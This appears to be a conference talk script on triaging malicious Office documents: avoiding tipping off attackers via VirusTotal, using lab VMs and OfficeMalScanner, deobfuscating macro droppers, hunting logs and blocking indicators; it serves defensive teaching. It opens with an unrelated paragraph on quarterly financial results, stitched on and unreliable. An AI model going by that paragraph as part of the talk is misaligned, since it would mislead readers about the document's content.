The document discusses the financial results of a company for the quarter. Revenues were up 10% over the same period last year driven by strong performance across all business segments. However, earnings per share were lower than expected due to higher operating expenses and one-time restructuring costs. The company expects continued revenue growth and cost savings initiatives to improve profitability going forward.
So, quick show of hands…no shame in your game, but who’s current methodology for checking out malicious docs is to throw it on VirusTotal, and just work from that analysis? That’s fine, but hopefully we’re going to level you up this morning.For a long time, that was my approach too. Drop the file on VT, maybe dig a little deeper and see what it was doing, or if our AV was catching it, wash my hands and move on. Then one day I was taking a pentesting class with Dave Kennedy @ Blackhat and he mentioned VT as a tool for attackers. That’s when my worldview shifted.Think of it this way: If you’re an attacker making a targeted attack, what better way to know if those pesky IT folks are on to you than to just query the VT API looking for someone to upload the file. If it gets uploaded, shut down the operation and try again in a few weeks. If you’re uploading to VT, you could be giving the attacker knowledge that you may not want to. You should be holding your cards as close as you can for as long as you can before you give them any information.NOTE: 99.99999999% of the time you’re going to be getting commodity malware that is just part of accepting email on the internet. However, it’s worth acting like it’s something more serious until you have evidence otherwise.
When conducting any kind of analysis your best path to success is to have a list of questions you want answered. Otherwise you can end up very deep in the weeds gathering info that just isn’t relevant to you or your operations. I’ve provided a few sample questions that I usually try to answer. Maybe these work for you, maybe there are other things you want to know.Q1: Are you sure none of your users are infected? Especially in the case of OfficeDoc malware, it is almost never going to be caught by AV. The second stage might be, but without analysis you won’t know. Even if there are signatures at the time of analysis, depending on the lead time, your users may have been infected before the signature was deployed. Unless you look specifically for indicators of the malware, you can’t be certain about the health of your environmentQ2: Was the purpose to download a 2nd stage malware? What was it’s purpose? Was this a commodity phish just trying to steal gmail/dropbox/twitter creds? Is this a targeted phish looking to steal company credentials? These are all important questions to answer to try to determine how serious the threat truly is.
Q3: Why did your users even get the email? Surely you’re running anti-spam protections. Hopefully you’re running an email firewall that you’ve dutifully tweaked to minimize your exposure. Why did it fail? What did this do that your current defenses missed? Is there something you can add in a broad sense to prevent this in the future?
You should never perform any kind of malware analysis on a live system. In an ideal scenario you’d have two VMs. One local on your computer where you can run various static analysis tools, and another one on a VPS that isn’t attributable to your organization. REMnux is a great distribution created by Lenny Zeltser that gets you a lot of good analysis tools straight out of the box. It will provide plenty of tools to do the analysis that we discuss here and a massive toolbox to expand your capabilities if you decide to go down that path.Locally, just a Windows VM with Office installed is probably your best bet. You can get free windows VMs at modern.ie. There’s a time limit on the license, but if you revert before every analysis then you should be fine. You can also download a trial version of Office from Microsoft. That license will probably expire in the 30 days, so your best bet would be to have a legit license.
It can be tempting to run static analysis tools locally, but it’s really not advised. Sometimes through use of various tools it can actually lead to execution of some parts of the malware. You don’t want to have to write up the incident report about how you infected the company with ransomware.
Another benefit of using a VM is you can revert to a fresh snapshot for every piece of malware you analyze. If you really want to get fancy with it, you could have multiple snapshots with various versions of Office installed.
It’s fine to find samples online and analyze that way, and it’s even a decent way to learn, but you really should be analyzing stuff from your environment as soon as you can.If you don’t already have a process in place to phish your employees, you should get that started ASAP. You should be phishing early and often. The more exposure your users have to it, the more opportunity you have to educate them about the warning signs and reinforce the behavior of reporting. There are a ton of options in this space, but to call out a couple, PhishMe is a good open source solution if you don’t have budget for a program like this or you just want to test the waters. If you want to up your game with a paid service, I really can’t recommend KnowBe4 enough. They have an excellent phishing platform tied with a user awareness program and the price is really incredible considering the value.
Once you have the phishing program in place, you want to do everything you can to encourage your users to forward the emails and to not click. The best way I’ve found is through gamification. One program I’ve used in the past is for every phishing campaign I initiated, I would track everyone that reported the email. Then at the end of the campaign I’d randomly select a user to get an amazon gift card. This conditions users to forward a ton of emails hoping to catch a campaign you’ve initiated. You can also look into a “wall of shame” where you call out certain departments that have the highest click percentages on your campaigns. No one wants to be the manager of that department!
Also, make sure you train your users to send emails as attachments. This allows you to review the full original headers leading to better analysis.
So first things first, we’re going to do what I told you not to do and go to VirusTotal. BUT we’re not going to upload the file. We’re going to use the handy search function. You’ll need to generate the MD5 sum to search on, and then just paste it in and search. If you’re lucky, someone else has already uploaded it and you can rest easy knowing it was likely just a massive spam wave. Check the comments and see if anyone has already found the indicators for it. If so, you’ve had a really easy case…you can search the indicators, implement blocks and have a cup of coffee.As best I can tell, there’s no way to access the search history on VirusTotal, so it’s fairly OPSEC secure.
So you didn’t get lucky…no one had submitted your file to VT. Now it’s time to pull back the covers on the file and see what’s really going on. For this, my go-to tool is Officemalscanner. This tool provides an easy interface to scan documents for embedded malicious content(less likely) and also extracting embedded macro code(most important). AV and traditional host-based prevention tech has basically rendered most truly malicious officedocs pretty well obsolete. In the last 3 years that I’ve spent looking at malicious office docs, I’ve seen zero that are malicious in and of themselves. Every sample I’ve ever encountered has been a dropper to download a 2nd stage malware and execute it. Occasionally it will also establish persistence for the 2nd stage, but most often it’s just download and execute.
Just a note, the zip file on the website is password protected and I’ve included the password here for reference
These are some of the common options for officemalscanner. Generally the ‘info’ option is going to get you where you need to be. That will dump the macro code to a text file and you can dig in. Again, the inflate option is here for documents like docx, and scan/brute and mostly used for actual malicious documents.
[Show demo of badstuff.doc]
So now comes the real heavy lifting. No one says you have to be a programmer to take care of this mess. The main concepts you need to understand are variables…set something to a name and give it a value. This can be utilized to set all of the pieces of a command out of order and just generally make things appear to be confusing. Another fun trick that sometimes is used is creating a function that just returns a string. Then you can call the functions in the right order and get what you need. This one is pretty simple to figure out if you just scan for tell tale signs of URLs…looking for things like ‘http’, or ‘://’ ‘exe’. Generally once you find that thread you can back trace through it all and reconstruct the download link, which is really what we’re looking for.
Another common technique is to construct VB scripts through ASCII codes. For this one, you really just have to put on some tunes and work through it piece by piece. It gets faster the more you do it, and once you start constructing strings you’ll know whether you’re on the right track or not. I’ve hacked together some powershell before to parse through large series of char codes, so that’s also certainly an option.
[show example files]
So now we’re at the main event..this is what the attacker was really trying to get on to our system. Again, we still don’t know if this is a targeted attack or commodity malware. We still need to practice safe Opsec! This is where our VPS is going to come into play. Pull the file down with a browser or wget, and see what you end up with. Most of the time you’re going to get [filename].exe. Sometimes you’ll get [filename] because your initial macro was going to add the extension later. A quick pass with ‘file’ will let you know what you have.Now generate another md5 hash and check VT. You’re almost certain to find someone has already uploaded it and can tell you exactly what you’ve got. If that’s the case, go ahead and try to download it over your corporate network and see if that 2nd stage URL is being blocked yet.
If you don’t find that 2nd stage on VT, you may have bigger problems. Malware is notoriously easy to modify to evade AV, so just because it isn’t there doesn’t mean it’s China. However, you’re now getting into territory beyond the scope of this talk. At this point you’ll probably want to engage an IR team if you have one. If you’ve got a MSSP, give them a call. This is going to require some pretty heavy lifting reversing.
So now you’ve done all the fun stuff…now you have to do the stuff that pays the bills. Let’s answer some of those questions that your boss cares about.
Who received the email? Check your mail logs looking for similar senders, similar subjects or similar attachments. Hopefully you can find the full reach of the campaign. Send off a friendly note to the users notifying them that they received a malicious doc/email, and kindly ask them to delete it. This is two fold…maybe you’re doing your analysis early in the AM (YOU SHOULD!) and you can notify your users before many of them even report for work. It’s also nice if you have UK offices because they seem to catch and report the brunt of it just because of time zones. Second, it keeps you visible in the org, and makes you seem like a friendly helpful person instead of the security cop.
In the email you send to users, it’s a good idea to include a clause in there asking if they opened the attachment or clicked the link to notify you immediately. Then comes the IR. HOWEVER, users are not always so forthcoming with such info especially when you’re just getting started. Everyone thinks they’re going to be scolded or even fired for making such a mistake. It’s important that instead of scolding, just ask them in the future to be a little more skeptical and forward more emails to you before opening attachments. Obviously if you have repeat offenders then maybe you look into extra training or escalating to their manager, but tread carefully.
So since users may not want to share such information with you, you’ve got to dig into those logs. Check URL filtering logs for instances of the 2nd stage URL. Check your firewall for any IPs you uncovered during your analysis. Trace that back to a user and…then comes the IR.
Finally, after you’ve notified and found any potential infections, you should go ahead and block the offending IPs and URLs. Best practice here may be to create special groups for these blocks. Since the hosts and websites used in malware campaigns tend to be compromised legitimate services, you may end up blocking functionality to the legitimate site. To prevent this, you might consider expiring these blocks after 7-14 days. Often malware campaigns only utilize indicators for a very short time period, so it’s fairly unlikely that you’ll see the same stuff bubbling up again.
So maybe you’ve made it through this talk and you’re thinking, “Doug, this is still all too hard. China doesn’t care about me, I’m going to throw everything at virus total and online sandboxes and there’s nothing you can do about it”. Okay…feelings hurt, but I get it. AT LEAST consider implementing some of these quick wins. These things can often be implemented with just a light amount of research and are often “set it and forget it” solutions, but they will affect your overall malware exposure fairly considerably.
First quick win, “block commonly malicious files”. I’ve got a link here in the slides (which I’ll share at the end of the preso) which lists various file formats that are commonly used for bad-ness. Some of them are pretty easy like .BAT, .SCR and .EXE. Hopefully you’re already blocking those at your email gateway. If not, maybe think about giving an IR firm a call because you might have some unwanted guests. However, how many of you are blocking HTA? What about WSF? These are two lesser known formats that I’ve personally seen used maliciously in the last month and there is likely almost no reason these formats should ever make it through your email gateway. Some of them are obviously good ideas, but depending on your environment may not be feasible to block.
However, that leads to quick win #2: “Change default file extensions” So your IT team is shooting VB scripts and .js files through email all the time and there’s just no way you can block those files at the gateway..no way no how. Okay, fine. Let’s at least dull those fangs a little and just change the default file extension. Changing .js files to open by default in notepad instead of Windows Script Host is a no-brainer. It’s likely that if anyone is regularly sharing these file formats through email that they’re fairly technically literate. They can manually load the files using whatever they like, but double click is going to open it in notepad. This has the potential for annoyances, so be sure to work WITH the business unit when developing policies like this.
Finally, your biggest defense is always going to be users, so the third win is “Encourage trust, but verify”. Users are not dumb. Say it with me this time…USERS ARE NOT DUMB. Your organization is likely full of extremely intelligent, creative folks. They may make some mistakes as it relates to security, but that’s not a slight on them, this stuff is hard. I mean you’re attending a 3 day conference in which people spend all day talking about how to attack and how to defend. Even things that seem rudimentary to you are not necessarily obvious to someone who just wants to do their job. However, users can be trained. The key phase to use is trust, but verify. Work on user awareness trainings and bulletins and flyers to hang in the office, drumming this concept into their heads. People should see you in the hallway and say “Hey look, it’s that trust but verify dude!” Encourage users to think critically about attachments and links they receive. If you get a file from someone, ask “Do I normally get files from this person? Is this a format they usually come in?” If either of those questions cause pause, CALL THEM. That quick phone call will often not only allow you to confirm/deny legitimacy, but you’ll also be notifying them of a potential compromise of their email. Also encourage people to investigate issues that are cause for alarm like invoices for extravagant goods or scammy account alert emails by just going to the company website directly instead of following links.
This is hard work for certain. There are entire companies built just around social engineering. There are many who are VERY good at this. However, with enough drilling and enough repetition, you may start to cause users to stop, pause and forward that email to you.
Maybe some of you feel differently..maybe this talk has been inspiring, inspirational and has lit a fire for a passion for malware analysis that you never knew you had. GREAT! Here are some resources to use for further study.
Practical Malware Analysis is really the standard bearer for books on malware analysis. This book will take you from nearly no knowledge to full-on reverse engineering by the end. It walks you through the steps to be taken when creating a malware analysis lab, basic static and dynamic analysis and advanced static and dynamic analysis through the use of disassemblers and debuggers. You can really go as deep or as shallow as you want with this one, but every budding analyst should have this on their bookshelf.
Also, Rensselaer Polytechnic Institute has a group called RPISEC and they’ve open sourced two fantastic courses that were taught at RPI. One is on modern binary exploitation, so do check that out if exploit dev is your cup of tea. The other was on malware analysis and is equally fantastic. The textbook for the course is the previously mentioned Practical Malware Analysis but it presents the material in a more structured and expanded way. There are additional labs beyond what is present in the book.
Finally, nearly every year Tyler Hudak, the creator of MASTIFF, offers an intro to malware analysis course here at DerbyCon. It may be offered at other cons, but he’s pretty reliably here. I’ve taken this course and it was a great exposure to basic static and dynamic analysis from a very knowledgable researcher. He’s very passionate about his work and will gladly stay after for further explanation or for bonus material. When I took the course last year, we stayed for an extra hour at the end of the course and he gave a crash course on memory analysis that was fantastic.
